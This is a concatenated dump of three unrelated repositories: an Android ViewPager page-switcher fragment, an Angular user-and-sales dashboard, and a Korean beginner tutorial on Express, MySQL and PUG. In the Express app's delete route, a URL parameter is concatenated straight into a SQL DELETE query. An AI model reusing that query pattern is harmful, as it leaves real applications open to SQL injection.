//该方法用于销毁指定的页面
public void destroyItem(ViewGroup container,int position,Object object){
((ViewPager)container).removeView(views.get(position));
}
}
public void init(){//该方法用于初始化需要显示的页面,并将其添加到集合中
for(int i=0;i<layouts.length;i++){
View view=getLayoutInflater().inflate(layouts[i], null);
views.add(view);
pagerTitles.add(titles[i]);
}
}
public void initImg(){//该方法用于初始化底部图片,并将图片添加到水平线性布局中
for(int i=0;i<mImgViews.length;i++){
mImgViews[i]=new ImageView(MainActivity.this);
if(i==0){//默认情况下第一张图被选中
mImgViews[i].setImageResource(R.drawable.choosed);
}else{
mImgViews[i].setImageResource(R.drawable.unchoosed);
}
mImgViews[i].setPadding(20, 0, 0, 0);
mImgViews[i].setId(i);
mImgViews[i].setOnClickListener(mOnClickListener);
mImgs.addView(mImgViews[i]);
}
}
//声明一个匿名的单击事件处理器变量,用于处理底部图片的单击事件
//主要是切换图片的显示,被单击的图片显示为红色,其他的显示为黄色
private OnClickListener mOnClickListener=new OnClickListener(){
public void onClick(View v){
resetImg();//重置图片的显示,将所有的图片都设置为黄色
//将被单击的图片设置为红色
((ImageView)v).setImageResource(R.drawable.choosed);
//切换页面的显示,根据单机的图片显示对应的页面
mViewPager.setCurrentItem(v.getId());
}
};
public void resetImg(){//该方法用于将所有的ImageView都显示为未选中状态的图片
for(int i=0;i<mImgViews.length;i++){
mImgViews[i].setImageResource(R.drawable.unchoosed);
}
}
}
|
8b9ec16c1b4d10a62aa2e04c909f6c42abca49ba
|
[
"Java"
] | 1 |
Java
|
wumanrou/pageswitcher
|
09f84dd8401176dceebed9d43b16ba4f7ee82f37
|
cb2c515110d53a1b070a7ee70178c053189cb301
|
refs/heads/main
|
<file_sep>import { Component, OnInit } from '@angular/core';
import { DetailsService } from '../details.service';
@Component({
selector: 'app-first-component',
templateUrl: './first-component.component.html',
styleUrls: ['./first-component.component.css']
})
export class FirstComponentComponent implements OnInit {
constructor(public _emp: DetailsService,) {}
Object = Object;
ngOnInit() {}
goToFirstPage = () => {
this._emp.firstStep = true;
this._emp.isNewDetails = false;
}
}
<file_sep>import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';
import { FormsModule } from "@angular/forms";
import { AppComponent } from './app.component';
import { FirstComponentComponent } from './first-component/first-component.component';
import { AppRoutingModule } from './app-routing.module';
import { ChartsModule, ThemeService } from 'ng2-charts';
import {MatCardModule} from '@angular/material/card';
import { FlexLayoutModule } from '@angular/flex-layout';
import {MatListModule} from '@angular/material/list';
import {MatDividerModule} from '@angular/material/divider';
import { AngularFontAwesomeModule } from 'angular-font-awesome';
import { BrowserAnimationsModule } from '@angular/platform-browser/animations'
import {MatIconModule} from '@angular/material/icon';
import { DetailsService } from './details.service';
import {MatButtonModule} from '@angular/material/button';
import {MatToolbarModule} from '@angular/material/toolbar';
import {MatBadgeModule} from '@angular/material/badge';
import {MatGridListModule} from '@angular/material/grid-list';
@NgModule({
declarations: [
AppComponent,
FirstComponentComponent
],
imports: [
FormsModule,
BrowserModule,
MatCardModule,
AppRoutingModule,
FlexLayoutModule,
MatDividerModule,
MatIconModule,
MatListModule,
ChartsModule,
BrowserAnimationsModule,
AngularFontAwesomeModule,
MatButtonModule,
MatToolbarModule,
MatBadgeModule,
MatGridListModule
],
providers: [ThemeService,DetailsService],
bootstrap: [AppComponent]
})
export class AppModule { }
<file_sep>import { Injectable } from '@angular/core';
import { of } from 'rxjs';
@Injectable({
providedIn: 'root'
})
export class DetailsService {
constructor() { }
userId = null;
isNewDetails = false;
firstStep = true;
myImage : string = "https://i.ibb.co/26chhvk/map.jpg";
proImage : string = "https://i.ibb.co/kXpGFyf/profile.jpg";
letterImage : string = "https://i.ibb.co/HtR8WMB/angular-Icon.png";
getSales() {
return of({
"year1": {
"volumeSales": "0.09",
"valueSales": "1.23"
},
"year2": {
"volumeSales": "0.11",
"valueSales": "1.56"
},
"year3": {
"volumeSales": "0.12",
"valueSales": "1.69"
},
"year4": {
"volumeSales": "0.12",
"valueSales": "1.64"
},
"year5": {
"volumeSales": "0.10",
"valueSales": "1.41"
},
"total": {
"volumeSales": "0.55",
"valueSales": "7.53"
}
});
}
private apiURLId1 = "https://reqres.in/api/users/1";
private apiURLId2 = "https://reqres.in/api/users/2";
private apiURLId3 = "https://reqres.in/api/users/3";
private apiURLId4 = "https://reqres.in/api/users/4";
private apiURLId5 = "https://reqres.in/api/users/5";
private apiURLId6 = "https://reqres.in/api/users/6";
firstId:{};
secondId:{};
thirdId:{};
fourthId:{};
fifthId:{};
sixthId:{};
async firstRunningMethod() {
try{
let response = await fetch(this.apiURLId1);
let readAbleData = await response.json();
this.firstId = readAbleData.data;
} catch(error){console.log(error)}
}
async secondRunningMethod() {
try{
let response = await fetch(this.apiURLId2);
let readAbleData = await response.json();
this.secondId = readAbleData.data;
} catch(error){console.log(error)}
}
async thirdRunningMethod() {
try{
let response = await fetch(this.apiURLId3);
let readAbleData = await response.json();
this.thirdId = readAbleData.data;
} catch(error){console.log(error)}
}
async fourthRunningMethod() {
try{
let response = await fetch(this.apiURLId4);
let readAbleData = await response.json();
this.fourthId = readAbleData.data;
} catch(error){console.log(error)}
}
async fifthRunningMethod() {
try{
let response = await fetch(this.apiURLId5);
let readAbleData = await response.json();
this.fifthId = readAbleData.data;
} catch(error){console.log(error)}
}
async sixthRunningMethod() {
try{
let response = await fetch(this.apiURLId6);
let readAbleData = await response.json();
this.sixthId = readAbleData.data;
} catch(error){console.log(error)}
}
}
<file_sep>import { Component, OnDestroy, OnInit } from '@angular/core';
import { DetailsService } from './details.service';
import { Subscription } from 'rxjs'
@Component({
selector: 'app-root',
templateUrl: './app.component.html',
styleUrls: ['./app.component.css']
})
export class AppComponent implements OnInit, OnDestroy{
title = 'materialChartjs';
private apiURL = "https://reqres.in/api/users";
mdeiaSub:Subscription;
deviceXs:boolean;
constructor(public _emp: DetailsService) {}
public barChartOptions: any = {
scaleShowVerticalLines: false,
responsive: true
};
public barChartLabels: string[];
public barChartType: string = 'bar';
public barChartLegend: boolean = true;
public barChartData: any[] = [
{ data: [], label: 'Volume Sales' },
{ data: [], label: 'Value Sales' }
];
tiles = [
{text: 'One', cols: 1, rows: 1, color: 'white',},
{text: 'Two', cols: 1, rows: 1, color: 'white'},
{text: 'Three', cols: 1, rows: 1, color: 'white'},
];
ngOnInit() {
this._emp.getSales().subscribe(data => {
this.barChartLabels = Object.keys(data);
this.barChartLabels.forEach(label => {
this.barChartData[0].data.push(data[label]['volumeSales']);
this.barChartData[1].data.push(data[label]['valueSales']);
});
});;
this.longRunningMethod();
}
ngOnDestroy(){
this.mdeiaSub.unsubscribe();
}
arr = [];
async longRunningMethod() {
try{
let response = await fetch(this.apiURL);
let readAbleData = await response.json();
this.arr = readAbleData.data;
console.log(readAbleData)
} catch(error){console.log(error)}
}
showDetails = (_ID) => {
this._emp.isNewDetails = true;
this._emp.firstStep = false;
this._emp.userId = _ID;
console.log(`this._emp.userId = ${this._emp.userId}`)
if(this._emp.userId==1){
this._emp.firstRunningMethod();
}
if(this._emp.userId==2){
this._emp.secondRunningMethod();
}
if(this._emp.userId==3){
this._emp.thirdRunningMethod();
}
if(this._emp.userId==4){
this._emp.fourthRunningMethod();
}
if(this._emp.userId==5){
this._emp.fifthRunningMethod();
}
if(this._emp.userId==6){
this._emp.sixthRunningMethod();
}
}
}
|
33babbc3636c0d009a88389dbba3769802eb2324
|
[
"TypeScript"
] | 4 |
TypeScript
|
SoniaChauhan/dashboardProject
|
ac44137504ba0d2e6836f841d8b8178be1ce2f7c
|
21d8683871b7a18ed8817e0616e9a2a19b10e255
|
refs/heads/master
|
<file_sep>const zp = n => n<10 ? "0"+n : n;
const isoDate = (d, type) => {
/*
type: 1 => 2019-11-03 11:11:11
type: 2 => 19-11-03
type: 3 => 2019년 11월 03일
*/
let types = type? type: 1;
let year = d.getFullYear();
let month = zp(d.getMonth() + 1);
let day = zp(d.getDate());
let hour = zp(d.getHours());
let min = zp(d.getMinutes());
let sec = zp(d.getSeconds());
switch(types) {
case 2:
return String(year).substr(2)+"-"+month+"-"+day;
break;
case 3:
return year+"년 "+month+"월 "+day+"일";
break;
default:
return year+"-"+month+"-"+day+" "+hour+":"+min+":"+sec;
}
}
const js2Iso = (obj, field) => {
const reData = obj.map((item) => {
item[field] = isoDate(item[field]);
return item;
});
return reData;
}
module.exports = {zp, isoDate, js2Iso};<file_sep># SQL(Structure Query Language) 문
## 1. 데이터 삽입
~~~sql
INSERT INTO users (username, age, wdate) VALUES ("홍길동", 28, "2019-11-03 10:20:25");
INSERT INTO users SET username="홍길만", age=25, wdate="2019-11-03 10:24:25";
~~~
## 2. 데이터 가져오기
~~~sql
/* SELECT (필드명, 필드명) FROM (테이블명); */
SELECT id, username, age, wdate FROM users;
SELECT username, age FROM users;
SELECT * FROM users;
SELECT * FROM users ORDER BY id ASC;
SELECT * FROM users ORDER BY id DESC;
~~~
## 3. 데이터 삭제하기
~~~sql
DELETE FROM users WHERE id=2; /* id=2 삭제*/
DELETE FROM users WHERE id>2000; /* id > 2000 삭제*/
/* id > 2000 이고 username에서 (%는 와일드카드), username like '%길동%' => 길동 앞에 무엇이든 와도 되고, 길동 뒤에 무엇이든 와도 됨. */
DELETE FROM users WHERE id>2000 AND username like '%길동%';
DELETE FROM users WHERE username='홍길동';
~~~
## 4. 데이터 수정하기
~~~sql
UPDATE 테이블명 SET 필드명='값', 필드명2='값2' WHERE 필드명=값;
UPDATE users SET username='홍길동', age=25 WHERE id=3;
~~~<file_sep>const mysql = require('mysql2/promise');
const conn = mysql.createPool({
host: "localhost",
port: 3307,
user: "test",
password: "<PASSWORD>",
database: "node",
connectionLimit: 10,
waitForConnections: true
});
const sqlExec = async (sql, sqlVals) => {
const connect = await conn.getConnection();
const result = await connect.query(sql, sqlVals);
connect.release();
return result;
}
module.exports = {mysql, conn, sqlExec};<file_sep>const express = require("express");
const app = express();
const port = 3000;
app.listen(port, ()=> {
console.log("http://127.0.0.1:"+3000);
});
// mysql.js
const mysql = require('mysql');
const conn = mysql.createPool({
host: "localhost",
port: 3307,
user: "test",
password: "<PASSWORD>",
database: "node",
connectionLimit: 10
});
/* var conn = mysql.createConnection({
host : 'localhost',
user : 'test',
port : '3307',
password : '<PASSWORD>',
database : 'node'
}); */
// util module
const bodyParser = require("body-parser");
app.use(bodyParser.urlencoded({extended: false}));
// 정적 루트 설정
app.use("/", express.static("./public"));
// PUG 설정
app.set("view engine", "pug"); // View Engine 지정
app.set("views", "./views"); // View가 저장된 폴더 지정
app.locals.pretty = true; // response 되는 소스를 이쁘게...
const users = [
{id: 1, name: "홍길동", age: 25},
{id: 2, name: "홍길순", age: 28},
{id: 3, name: "홍길만", age: 32},
];
app.get(["/pug", "/pug/:type"], (req, res) => {
let name = req.query.name;
let titleChk = req.query.titleChk;
let type = req.params.type;
const vals = {name, title: "PUG연습", users, titleChk};
switch(type) {
case "include":
res.render("include", vals);
break;
default:
res.render("block", vals);
break;
}
});
app.get(["/api", "/api/:type"], (req, res) => {
let type = req.params.type; // undefined
if(!type) type = "list";
switch(type) {
case "list":
res.json({
result : users
});
break;
default :
break;
}
});
app.get(["/date", "/date/:type"], (req, res) => {
let type = req.params.type;
if(!type) type = "ts";
switch(type) {
case "ts":
res.send('<h1>'+String(new Date().getTime())+'</h1>');
break;
default:
res.send('<h1>'+String(new Date())+'</h1>');
break;
}
});
app.get("/insert-in", insertIn);
function insertIn(req, res) {
const vals = {tit: "데이터 입력", subTit: "회원가입"};
res.render("sql/insert", vals);
}
// 기본적인 mysql 처리 - createConnection()
app.post("/insert/:type", insertFn);
function insertFn(req, res) {
const type = req.params.type;
switch(type) {
case "save":
var username = req.body.username;
var age = req.body.age;
var wdate = "2019-11-03 11:55:55";
//var sql = `INSERT INTO users SET username="${username}", age=${age}, wdate="${wdate}"`;
var sql = "INSERT INTO users SET username=?, age=?, wdate=?";
var sqlVals = [username, age, wdate];
conn.connect();
conn.query(sql, sqlVals, function (error, results, fields) {
if (error) {
console.log(error)
res.send("Error");
}
else {
console.log('The solution is: ', results);
if(results.affectedRows == 1) {
res.send("잘 저장 되었습니다.");
}
else {
res.send("데이터 저장에 실패하였습니다.");
}
}
});
conn.end();
break;
case "save-pool":
var username = req.body.username;
var age = req.body.age;
var wdate = "2019-11-03 11:55:55";
var sql = "INSERT INTO users SET username=?, age=?, wdate=?";
var sqlVals = [username, age, wdate];
conn.getConnection((error, connect) => {
if(error) console.log(error);
else {
connect.query(sql, sqlVals, (error, results, fields) => {
if(error) console.log(error);
else {
res.json(results);
}
connect.release();
});
}
});
break;
default:
res.send("취소");
break;
}
}<file_sep># PUG - View Engine
## 1. Jade로 만들어져서 -> pug
## 2. 특징 (https://pugjs.org)
### 가. Zen coding 스타일의 View Engine
### 나. 스페이스나 tab 둘중 하나로 코딩을 하여야 한다. - 들여쓰기
### 다. tag의 속성(attribute)은 ()안에 명시한다.
### 라. 태그 안에 문자열을 넣으려면 (예: title 문자열)
### 마. 태그 안에 변수를 넣으려면 (예: title= 변수명)
### 바. each value in array : pug가 가지고 있는 반복문
### 사. if 조건 : pug가 가지고 있는 제어문
### 아. 자바스크립트를 구현하기 위해서는 '-'를 써서 사용한다.
### 자. 주석은 //- 표현한다. (// <-- 이 주석은 html주석으로 나타나진다.)
### 차. include와 layout으로 구조를 표현한다.
~~~pug
html(lang="ko")
head
title 제목입니다.
body
div= content
- var arr = [1, 2, 3, 4, 5]
each i in arr
if i%2 == 0
div= `${i} (짝수)`
else
div= `${i} (홀수)`
~~~
## 3. Node.js(express) 에서의 활용
~~~js
app.set("view engine", "pug"); // pug를 사용할 때
app.set("view engine", "ejs"); // ejs를 사용할 때
app.set("views", "./views");
app.locals.pretty = true; // 클라이언트로 보내는 소스를 정렬하여 보내준다.
app.get("/sample", (req, res) => {
const vals = {} // 자바스크립트 객체로 변수를 전달한다.
res.render("sample", vals);
});
~~~
<file_sep>var xhr = new XMLHttpRequest();
xhr.open("GET", "/api/list");
xhr.addEventListener("load", function(){
var res = JSON.parse(this.responseText);
var html = '';
for(var i in res.result) {
html += '<tr>';
html += '<td>'+res.result[i].id+'</td>';
html += '<td>'+res.result[i].name+'</td>';
html += '<td>'+res.result[i].age+'</td>';
html += '</tr>';
}
document.querySelector(".table > tbody").innerHTML = html;
});
xhr.send();<file_sep>const express = require("express");
const app = express();
const port = 3000;
app.listen(port, ()=> {
console.log("http://1172.16.31.10:"+3000);
});
// node module
const bodyParser = require("body-parser");
app.use(bodyParser.urlencoded({extended: false}));
// my module
/*
const db = require("./modules/mysql-conn");
const mysql = db.mysql;
const conn = db.conn;
const sqlExec = db.sqlExec;
*/
const {mysql, conn, sqlExec} = require("./modules/mysql-conn");
const {alertLoc} = require("./modules/util-loc");
const {zp, isoDate, js2Iso} = require("./modules/util-date");
// 정적 루트 설정
app.use("/", express.static("./public"));
// PUG 설정
app.set("view engine", "pug");
app.set("views", "./views");
app.locals.pretty = true;
// Router - GET
app.get(["/user/:type", "/user/:type/:id"], userGet); // wr, li
// Router - POST
app.post("/user/:type", userPost);
// Router CB - GET
function userGet(req, res) {
const type = req.params.type;
const id = req.params.id;
switch(type) {
case "wr":
const vals = {tit: "데이터 입력", subTit: "회원가입"};
res.render("sql/insert", vals);
break;
case "li":
(async () => {
let sql = "SELECT * FROM users ORDER BY id DESC";
let result = await sqlExec(sql);
const vals = {
tit: "데이터 출력",
subTit: "회원리스트",
datas: js2Iso(result[0], "wdate")
};
res.render("sql/list", vals);
})();
break;
case "rm":
(async () => {
const sql = "DELETE FROM users WHERE id="+id;
const result = await sqlExec(sql);
if(result[0].affectedRows > 0) res.send(alertLoc("삭제되었습니다.", "/user/li"));
else res.send(alertLoc("삭제가 완료되지 않았습니다. 관리자에게 문의하세요.", "/user/li"));
})();
break;
case "up":
(async ()=>{
let sql = "SELECT * FROM users WHERE id=?";
let sqlVals = [req.params.id];
let result = await sqlExec(sql, sqlVals);
let vals = {
tit: "데이터 수정",
subTit: "회원 수정",
datas: result[0][0]
}
res.render("sql/update", vals);
})();
default:
break;
}
}
// Router CB - POST
function userPost(req, res) {
let type = req.params.type;
let username = req.body.username;
let age = req.body.age;
let id = req.body.id;
let sql = '';
let sqlVals = [];
let result = null;
switch(type) {
case "save":
(async () => {
sql = "INSERT INTO users SET username=?, age=?, wdate=?";
sqlVals = [username, age, isoDate(new Date())];
result = await sqlExec(sql, sqlVals);
res.send(alertLoc("저장되었습니다.", "/user/li"));
})();
break;
case "update":
(async () => {
sql = "UPDATE users SET username=?, age=? WHERE id=?";
sqlVals = [username, age, id];
result = await sqlExec(sql, sqlVals);
if(result[0].affectedRows > 0) res.send(alertLoc("수정되었습니다.", "/user/li"));
else res.send(alertLoc("수정에 실패하였습니다.", "/user/li"));
})();
break;
default:
break;
}
}
|
b6078fd709d88a04af7e80f254de513fa343827c
|
[
"JavaScript",
"Markdown"
] | 7 |
JavaScript
|
booldook/2019-kn-node-04.pug
|
a4fd4de98773d86c564f03639c4c913e7d46856b
|
61809c961da00f43547f2a4c3e8b586b0b8bf52b
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.